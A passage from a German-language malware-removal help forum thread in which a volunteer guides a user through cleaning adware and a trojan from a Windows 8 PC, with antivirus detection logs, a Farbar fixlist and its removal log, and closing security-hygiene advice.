sh=43384D99FC7C2C56513070D39FA39812F018478E ft=0 fh=0000000000000000 vn="Win32/Trustezeb.K Trojaner" ac=I fn="C:\Windows.old\Users\Manz\AppData\Local\Temp\Forderung nicht gedeckten Buchung Ihrer Bestellung Amazon GmbH.zip"
sh=52881F0B881DC0A48041BC07FAE533EAE4F2F1A9 ft=1 fh=c0037e7643419e5d vn="Variante von Win32/Toolbar.Iminent.O evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Users\Manz\AppData\Roaming\igdhbblpcellaljokkpfhcjlagemhgjl\minibarchrome.exe"
sh=86882B28EC01AA7F89E6D4C4DE8554BAED701B7C ft=1 fh=1ac00489ca5ee6bb vn="Variante von Win32/ELEX.DS evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Users\Manz\AppData\Roaming\Omiga Plus\app\config\69\Chaos_Rage.db"
sh=6E58AF619D13A6BCCB7A0B475115452AEAFF6FB1 ft=1 fh=2dbdc7e59531f5e8 vn="Variante von Win32/ELEX.GY evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Users\Manz\AppData\Roaming\Omiga Plus\app\temp\Wallpaper.exe"
sh=8B46FB8ACBD9A416437C4497525612077B2E0AB0 ft=1 fh=0ef347d9e115fbae vn="Variante von Win32/ELEX.GY evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Users\Manz\AppData\Roaming\Omiga Plus\update\omigaplus_update_v1.6.6.exe"
sh=462A8A9D3FAA3C08D3E1D65A93022F2263026F5B ft=0 fh=0000000000000000 vn="Variante von Win32/SweetIM.L evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Windows\Installer\9c1c1cb.msi"
sh=71A41DF9AAF1E1F783A6B6E953ACBDAB8A25E344 ft=0 fh=0000000000000000 vn="Variante von Win32/SweetIM.L evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Windows\Installer\9c1c1cf.msi"
sh=195E06474CD71867AEE3CC9C415F095328EA3935 ft=0 fh=0000000000000000 vn="Win32/SweetIM.K evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Windows\Installer\9c1c1d3.msi"
sh=350D1FD2303CEA6D08D0C87AAA4921406B31A8F0 ft=0 fh=0000000000000000 vn="Variante von Win32/Toolbar.Iminent.K evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Windows\Installer\9e2d5.msi"
sh=81D9B1B1933B5A0600EBC38BD319ADF2EA7B1B2B ft=0 fh=0000000000000000 vn="Variante von Win32/Toolbar.Iminent.E evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Windows\Installer\9e2d9.msi"
sh=6E58AF619D13A6BCCB7A0B475115452AEAFF6FB1 ft=1 fh=2dbdc7e59531f5e8 vn="Variante von Win32/ELEX.GY evtl. unerwünschte Anwendung" ac=I fn="C:\_OTL\MovedFiles\06182013_204448\C_Users\Manz\AppData\Roaming\Omiga Plus\wallpaper_components.exe"
|
|
09.02.2016, 19:11
| #10 |
| /// TB-Ausbilder /// Anleitungs-Guru | Windows 8.x mit einer großen Auswahl an Schädlingen Sieht gut aus.  Welche Probleme bestehen noch?
__________________ Gruß deeprybka Lob, Kritik, Wünsche? Spende fürs trojaner-board? _______________________________________________ „Neminem laede, immo omnes, quantum potes, iuva.“ Arthur Schopenhauer |
|
09.02.2016, 19:36
| #11 |
| | Windows 8.x mit einer großen Auswahl an Schädlingen Wie es aussieht läuft er wieder einwandfrei. Mit dem Gerät kann wieder gearbeitet werden. Diesen Beitrag hab ich damit geschrieben, die bisherigen habe ich mit einem anderen geschrieben. Ich werde jetzt noch schauen ob Windows aktuell ist und bei Bedarf Updates installieren. Nochmals Danke für deine Hilfe.  |
|
10.02.2016, 12:41
| #12 |
| /// TB-Ausbilder /// Anleitungs-Guru | Windows 8.x mit einer großen Auswahl an Schädlingen Schritt 1  Drücke bitte die + R Taste und schreibe notepad in das Ausführen Fenster.Klicke auf OK und kopiere nun den Text aus der Codebox in das leere Textdokument: Code:
ATTFilter CloseProcesses:
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 [2016-01-31]
S3 brsrv; C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\brsrv.exe [X]
S2 Ofelje; "C:\Users\Manz\AppData\Roaming\IodelBefqo\Uithzaa.exe" -cms [X]
S3 sdfhgdf; system32\DRIVERS\sdfhgdf.sys [X]
Task: {1B2DFC51-4A80-475F-9BD8-32F048149B3C} - \Builder Touch2 -> Keine Datei
Task: {1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675} - \Builder Touch -> Keine Datei
Task: {75FE0009-11AD-45E4-87F0-7FA1441696FF} - \ManzObscenelyAdV2 -> Keine Datei
Task: {AF603348-4FAB-4919-B73D-66B59E54CBDF} - System32\Tasks\Awiikjuw => C:\PROGRA~1\SHOPPE~1\Zelba.bat
Task: {FD4BD04B-AE55-4A01-A755-4E28A2548E48} - \{0D0B7D47-0F7D-040B-7811-090D050F117E} -> Keine Datei
So wird's gemacht: Entfernen des Ordners "Windows.old" - Windows-Hilfe  Wir haben es geschafft! Die Logs sehen für mich im Moment sauber aus. Wenn Du möchtest, kannst Du hier sagen, ob Du mit mir und meiner Hilfe zufrieden warst... und/oder das Forum mit einer kleinen Spende  unterstützen.  Es bleibt mir nur noch, Dir unbeschwertes und sicheres Surfen zu wünschen und dass wir uns hier so bald nicht wiedersehen.   Cleanup: (Die Reihenfolge ist hier entscheidend) Falls Defogger verwendet wurde: Erneut starten und auf Re-enable klicken. Falls Combofix verwendet wurde:  Combofix deinstallieren
Alle Logs gepostet? Dann lade Dir bitte  DelFix herunter.
Hinweis: DelFix entfernt u.a. alle verwendeten Programme, die Quarantäne unserer Scanner, den Java-Cache und löscht sich abschließend selbst. Starte Deinen Rechner abschließend neu. Sollten jetzt noch Programme aus unserer Bereinigung übrig sein, kannst Du diese bedenkenlos löschen.  Absicherung: Beim Betriebsystem Windows die automatischen Updates aktivieren. Auch die sicherheitsrelevante Software sollte immer nur in der aktuellsten Version vorliegen: Browser Java Flash-Player PDF-Reader Sicherheitslücken (z.B. hier) in deren alten Versionen werden dazu ausgenutzt, um beim einfachen Besuch einer manipulierten Website per "Drive-by" Malware zu installieren. Ich empfehle z.B. die Verwendung von Mozilla Firefox statt des Internet Explorers. Zudem lassen sich mit dem Firefox auch PDF-Dokumente öffnen. Aktiviere eine Firewall. Die in Windows integrierte genügt im Normalfall völlig. Verwende ein Antivirusprogramm mit Echtzeitscanner und stets aktueller Signaturendatenbank. Meine Kauf-Empfehlung:  Zusätzlich kannst Du Deinen PC regelmäßig mit Malwarebytes Anti-Malware scannen. Optional:  NoScript verhindert das Ausführen von aktiven Inhalten (Java, JavaScript, Flash,...) für sämtliche Websites. Man kann aber nach dem Prinzip einer Whitelist festlegen, auf welchen Seiten Scripts erlaubt werden sollen. Malwarebytes Anti Exploit: Schützt die Anwendungen des Computers vor der Ausnutzung bekannter Schwachstellen.Lade Software von einem sauberen Portal wie  .Wähle beim Installieren von Software immer die benutzerdefinierte Option und entferne den Haken bei allen optional angebotenen Toolbars oder sonstigen, fürs Programm, irrelevanten Ergänzungen. Um Adware wieder los zu werden, empfiehlt sich zunächst die Deinstallation sowie die anschließende Resteentfernung mit Adwcleaner . Abschließend noch ein paar grundsätzliche Bemerkungen: Ändere regelmäßig Deine wichtigen Online-Passwörter und erstelle regelmäßig Backups Deiner wichtigen Dateien oder des Systems. Der Nutzen von Registry-Cleanern, Optimizern usw. zur Performancesteigerung ist umstritten. Ich empfehle deshalb, die Finger von der Registry zu lassen und lieber die windowseigene Datenträgerbereinigung zu verwenden.
__________________ Gruß deeprybka Lob, Kritik, Wünsche? Spende fürs trojaner-board? _______________________________________________ „Neminem laede, immo omnes, quantum potes, iuva.“ Arthur Schopenhauer |
|
11.02.2016, 20:55
| #13 |
| | Windows 8.x mit einer großen Auswahl an SchädlingenCode:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-01-2016
durchgeführt von Manz (2016-02-11 20:39:18) Run:1
Gestartet von E:\
Geladene Profile: Manz & UpdatusUser (Verfügbare Profile: Manz & UpdatusUser & Administrator)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
CloseProcesses:
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 [2016-01-31]
S3 brsrv; C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\brsrv.exe [X]
S2 Ofelje; "C:\Users\Manz\AppData\Roaming\IodelBefqo\Uithzaa.exe" -cms [X]
S3 sdfhgdf; system32\DRIVERS\sdfhgdf.sys [X]
Task: {1B2DFC51-4A80-475F-9BD8-32F048149B3C} - \Builder Touch2 -> Keine Datei
Task: {1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675} - \Builder Touch -> Keine Datei
Task: {75FE0009-11AD-45E4-87F0-7FA1441696FF} - \ManzObscenelyAdV2 -> Keine Datei
Task: {AF603348-4FAB-4919-B73D-66B59E54CBDF} - System32\Tasks\Awiikjuw => C:\PROGRA~1\SHOPPE~1\Zelba.bat
Task: {FD4BD04B-AE55-4A01-A755-4E28A2548E48} - \{0D0B7D47-0F7D-040B-7811-090D050F117E} -> Keine Datei
*****************
Prozess erfolgreich geschlossen.
C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 => erfolgreich verschoben
brsrv => Dienst erfolgreich entfernt
Ofelje => Dienst erfolgreich entfernt
sdfhgdf => Dienst erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1B2DFC51-4A80-475F-9BD8-32F048149B3C}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1B2DFC51-4A80-475F-9BD8-32F048149B3C}" => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Builder Touch2 => Schlüssel nicht gefunden.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675}" => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Builder Touch => Schlüssel nicht gefunden.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{75FE0009-11AD-45E4-87F0-7FA1441696FF}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{75FE0009-11AD-45E4-87F0-7FA1441696FF}" => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ManzObscenelyAdV2 => Schlüssel nicht gefunden.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF603348-4FAB-4919-B73D-66B59E54CBDF}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF603348-4FAB-4919-B73D-66B59E54CBDF}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Awiikjuw => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Awiikjuw" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FD4BD04B-AE55-4A01-A755-4E28A2548E48}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FD4BD04B-AE55-4A01-A755-4E28A2548E48}" => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0D0B7D47-0F7D-040B-7811-090D050F117E} => Schlüssel nicht gefunden.
Das System musste neu gestartet werden.
==== Ende von Fixlog 20:39:19 ====
|
|
11.02.2016, 21:26
| #14 |
| /// TB-Ausbilder /// Anleitungs-Guru | Windows 8.x mit einer großen Auswahl an Schädlingen OK.
__________________ Gruß deeprybka Lob, Kritik, Wünsche? Spende fürs trojaner-board? _______________________________________________ „Neminem laede, immo omnes, quantum potes, iuva.“ Arthur Schopenhauer |
|
| Themen zu Windows 8.x mit einer großen Auswahl an Schädlingen |
| bekannte, besonders, blick, browserfenster, entfernung, folge, folgende, gen, große, hoffe, konnte, login, meldungen, möglichkeit, neu, nichts, rechner, schädlinge, schädlingen, search, sofort, system, verschiedene, windows, öffnen |
dann auf 
und dann auf 
.
+ R Taste und schreibe Combofix /Uninstall in das 
Linear-Darstellung
